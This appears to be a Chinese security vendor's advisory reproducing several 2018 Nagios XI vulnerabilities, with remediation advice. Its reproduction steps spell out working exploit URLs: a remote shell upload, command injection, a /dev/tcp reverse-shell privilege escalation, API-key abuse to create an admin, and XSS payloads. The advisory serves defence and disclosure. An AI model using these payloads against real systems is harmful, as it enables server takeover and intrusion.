一、漏洞概述

1 简介

Nagios 是一款开源的免费网络监视工具，能有效监控 Windows、Linux 和 Unix 的主机状态，交换机路由器等网络设备，打印机等。在系统或服务状态异常时发出邮件或短 信报警第一时间通知网站运维人员，在状态恢复后发出正常的邮件或短信通知。

2018 年 11 月 13 日，Tenable 团队在其网站上公布了 Nagios XI 多个高危漏洞，其 中包含未授权远程命令执行漏洞，认证命令执行漏洞，提权漏洞，存储型 XSS，反射型 XSS 等多个漏洞。

2018 年 12 月 3 日，Seebug 平台收录了该些漏洞，知道创宇 404 漏洞应急团队开 始对该漏洞进行漏洞应急。

2 影响版本

⚫ Nagios XI < 5.5.7

 

二、漏洞复现

1 复现环境

⚫ Nagios XI 5.5.6

 

2 复现过程及结果

2.1 未授权远程命令执行漏洞(CVE-2018-15708)
1. 启动恶意 HTTPS 服务器，访问该服务器会返回恶意 PHP 代码。

2. 访问链接，请求恶意 HTTPS 服务器。 http://192.168.177.128/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scrip ts/magpie_debug.php?url=https://192.168.177.1:4443/%20-o%20/usr/local/na gvis/share/exec.php

 

可以看到，shell 已经成功的写入到服务器中。

3. 访问 shell。

2.2 Cmdsubsys.php(需认证)命令执行漏洞 (CVE-2018-15709)

1. 登陆后台，查看源码，找出 nsp 值。

2. 访问链接，执行 whoami 命令，将结果写入

/usr/local/nagiosxi/html/whoami.txt

http://192.168.177.128/nagiosxi/ajaxhelper.php?cmd=submitcommand&o

pts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22nagiosad

min%22,%22password%22:%22admin%27;id%20%3E%20/usr/local/nagvis/

share/id.txt;%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=

28686281bbebe5fc8ae2cfead993e697ff2cb6c9599f246568a3df2cf2720e55

 

 

3. 获取命令执行结果。

2.3 Autodiscover_new.php 提权漏洞(CVE-2018-15710)

1、为了演示，首先将权限降为 nagios 权限。

2、在外部监听 4444 端口，通过 autodiscover_new.php 文件进行提权。

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodisc over_new.php --addresses ='127.0.0.1/0; /bin/bash -i>& /dev/tcp/192.168.177.1/4444 0>&1;'

3. 可以看到，4444 端口返连回来的 shell，权限是 root 权限。

 

2.4 未授权 API KEY 再生漏洞(CVE-2018-15711) 低权限，经过身份验证的用户可以强制任何 Nagios XI 用户(包括管理员)重新生成 API KEY。 重新生成 API KEY 时，将在响应正文中返回一个新 KEY。 这使恶意用户能 够以更高级别的权限执行后续 API 调用。 例如，可以创建新的管理员用户。

1、添加一个普通用户 test，记录 nsp 的值。

2、重新生成管理员 API KEY。

http://192.168.177.128/nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts={% 22func%22:%22set_random_api_key%22,%22args%22:{%22user_id%22:1}}&ns p=e7ca0008dfc34a1f46daaafdde772970265a43f3460317b3b9aa2558ff5b4eb9

3. 使用第二步生成的 KEY，调用 API，添加一个管理员 test_admin。

http://192.168.177.128//nagiosxi/api/v1/add_user&apikey=RLLhPXVJv5Wk7n WHgIK0UoWJgKg2q76BR7RXl3WT7StdfqTv8UPiiL2SMhTsnf3v&username=tes t_admin&password=test_admin&email=test_admin@doo.com&name=test_a dmin+do&auth_level=admin&api_enabled=1&force_pw_change=0&can_see_

 

 

all_hs=1&can_control_all_hs=1&can_reconfigure_hs=1&can_control_engine=1 &can_use_advanced=1

4. 使用 test_admin 登陆，可以看到 test_admin 权限为管理员。

2.5 Api_tool.php 未授权存储型 XSS(CVE-2018-15712)
1. 配置 BPI(不用权限)。 http://192.168.177.128/nagiosxi/includes/components/nagiosbpi/api_tool.php ?cmd=syncall

2. 添加成员，会触发一个反射性 XSS。

http://192.168.177.128/nagiosxi/includes/components/nagiosbpi/api_tool.php ?cmd=addmember&group=linux-servers&host=hello%0a}%0adefine%20%3C

script%3Ealert(1)%3C/script%3E%20{%0adesc=%3C/strong%3E%3Cscript%3E alert(2)%3C/script%3E

3. 其他有权限用户查看 BPI 配置时，同样会触发 XSS payload。

2.6 Users.php(需认证) 存储型 XSS(CVE-2018-15713)

1. 在编辑用户属性时候，将 payload 插入到 Email 框中。

2. 再次查看该页面时会触发 XSS payload。

 

2.7 Checkauth.php(需认证) 反射型 XSS(CVE-2018-15714) 登陆后，访问

http://192.168.177.128/nagiosxi/account/checkauth.php?oname=" autofocus onfocus="javascript:alert(nsp_str)

 

三、漏洞影响

根据 ZoomEye 网络空间搜索引擎对 Nagios XI 服务的搜索结果，共找到 4258 条历史记录。

 

四、防护方案

1、Nagios 官方已经发布 5.5.7 版本修复这些漏洞，建议受影响的用户尽快升级更新 进行防护。

2、使用第三方防火墙进行防护(如创宇盾[https://www.yunaq.com/cyd/]) 3、技术业务咨询
知道创宇技术业务咨询热线 : 400-060-9587(政府，国有企业)、028-68360638(互联网企业)

 

 

五、相关链接

[1] Nagios 官网 https://www.nagios.com/

[2] Tenable 漏洞详情 https://www.tenable.com/security/research/tra-2018-37

[3]  Seebug 收录 https://www.seebug.org/vuldb/ssvid-97699

[4]  ZoomEye 网络空间搜索引擎 https://www.zoomeye.org/searchResult?q=nagiosxi